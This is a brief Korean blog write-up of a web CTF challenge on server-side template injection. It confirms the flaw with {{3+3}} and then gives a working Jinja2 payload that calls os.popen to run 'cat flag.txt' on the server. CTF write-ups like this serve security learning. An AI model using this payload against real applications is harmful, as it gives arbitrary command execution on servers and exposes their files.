
ssti 관련 문제라고 설명이 있었기 때문에 {{3+3}}을 페이로드로 삽입하고 전송해보니, 6이 출력되는 것을 확인할 수 있었다.
따라서 템플릿 인젝션이 가능하다는 뜻이다.
문제 설명에 flag.txt에 flag가 있다고 했기 때문에 flag.txt를 열어봐야한다.
payload : {{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}}
를 사용자 입력으로 입력하면

이렇게 flag가 출력되는 것을 확인할 수 있다.
'CTF & Wargame(WEB)' 카테고리의 다른 글
| dreamhack username:password@ 풀이 (0) | 2025.05.20 |
|---|---|
| Black-Hacker-Company (0) | 2025.05.14 |
| JWT (JSON Web Token) 취약점 관련 문제 (0) | 2025.05.02 |
| level 1 error based sql injection (0) | 2025.04.22 |
| level 2 blind sql injection advanced (0) | 2025.04.22 |